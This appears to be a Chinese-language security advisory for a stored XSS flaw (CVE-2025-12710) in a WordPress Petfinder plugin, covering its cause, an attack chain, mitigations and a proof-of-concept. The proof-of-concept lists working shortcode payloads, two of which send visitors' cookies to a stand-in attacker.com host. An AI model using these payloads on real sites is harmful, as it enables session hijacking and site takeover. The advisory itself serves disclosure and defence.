CVE-2025-12710 WordPress Petfinder插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12710

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pet-Manager – Petfinder plugin for WordPress

漏洞概述

CVE-2025-12710是WordPress Pet-Manager Petfinder插件中的一个存储型跨站脚本(XSS)漏洞。该插件是WordPress平台上用于管理宠物信息的流行插件，在全球范围内被广泛使用。漏洞存在于插件的kwm-petfinder短代码处理功能中，由于插件在处理用户提供的属性参数时，没有对输入进行充分的 sanitization（清理）和对输出进行适当的 escaping（转义），导致恶意脚本可以被永久存储在网站的数据库中。攻击者只需要拥有WordPress的Contributor级别权限（低权限角色）即可利用此漏洞。一旦恶意脚本被注入，任何访问包含该短代码的页面的用户都会自动执行攻击者植入的JavaScript代码。这可能导致会话劫持、敏感信息窃取、恶意重定向等严重安全问题。由于攻击是在合法网站上进行的，用户很难察觉正在遭受攻击，这使得该漏洞具有较高的隐蔽性和危害性。

技术细节

该漏洞的根本原因在于WordPress短代码处理流程中的输入验证和输出编码环节存在缺陷。Petfinder插件的kwm-petfinder短代码接受用户提供的属性参数（如id、name等），但直接将这些未经过滤的参数值插入到HTML输出中。攻击者可以通过构造特殊的payload来注入任意HTML/JavaScript代码。例如，在短代码属性中嵌入<script>标签或事件处理器（如onerror、onload等）。由于这些payload被存储在WordPress的post_content字段中，每次页面加载时都会从数据库读取并执行，形成存储型XSS攻击。漏洞代码位置主要在kwm-petfinder.php文件的133、163、164行附近，这些位置的代码直接输出用户可控的变量而未进行适当的htmlspecialchars()或esc_html()处理。攻击者利用此漏洞可以窃取管理员Cookie、修改页面内容、植入钓鱼页面或进一步利用其他漏洞提升权限。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本和Petfinder插件版本，确认插件版本≤3.6.1

STEP 2

权限获取

攻击者获取WordPress Contributor级别账户权限（通过社会工程、密码喷洒或利用其他漏洞）

STEP 3

恶意payload构造

攻击者构造包含XSS payload的特殊短代码，如[kwm-petfinder id="1"><script>alert(1)</script>"]

STEP 4

注入恶意代码

攻击者在WordPress页面/文章中插入构造好的短代码，payload被存储到数据库中

STEP 5

等待受害者访问

当普通用户或管理员访问包含恶意短代码的页面时，浏览器自动执行注入的JavaScript代码

STEP 6

敏感信息窃取

恶意脚本窃取用户会话Cookie、凭据或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

权限提升或进一步攻击

如果窃取的是管理员Cookie，攻击者可以接管整个WordPress站点，安装后门或植入更多恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12710 PoC: Stored XSS via kwm-petfinder shortcode -->
<!-- Authentication required: Contributor-level access or higher -->
<!-- This PoC demonstrates the XSS vulnerability in Petfinder plugin -->

<!-- Method 1: Using script tag -->
[kwm-petfinder id="1"><script>alert(document.cookie)</script><xss=""]

<!-- Method 2: Using event handler (onerror) -->
[kwm-petfinder name='test"><img src=x onerror=alert("XSS")>']

<!-- Method 3: Using onload event -->
[kwm-petfinder category='"><body onload=alert(String.fromCharCode(88,83,83))>']

<!-- Method 4: Stealing cookies -->
[kwm-petfinder pet_id='1"><script>fetch("https://attacker.com/steal?c="+btoa(document.cookie))</script>']

<!-- Method 5: Session hijacking payload -->
[kwm-petfinder search='"><script>document.location="https://attacker.com/phishing?"+document.cookie</script>']

<!-- Note: The injected script will execute when any user views the affected page -->
<!-- Payload persists in database until manually removed -->

<!-- To test in WordPress: -->
<!-- 1. Login as Contributor or higher -->
<!-- 2. Create/edit a post or page -->
<!-- 3. Insert one of the above shortcodes -->
<!-- 4. Save and view the page -->
<!-- 5. XSS alert will trigger on page load -->

影响范围

Pet-Manager Petfinder plugin for WordPress ≤ 3.6.1

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 临时禁用或删除Petfinder插件；2) 限制用户注册功能，只允许受信任的用户注册；3) 审查所有包含[kwm-petfinder]短代码的页面内容，移除可疑的payload；4) 在Web应用防火墙(WAF)中设置规则，检测和阻止包含<script>、onerror、onload等XSS特征的请求；5) 启用双因素认证，特别是对于管理员账户；6) 监控网站访问日志，关注异常的JavaScript执行行为。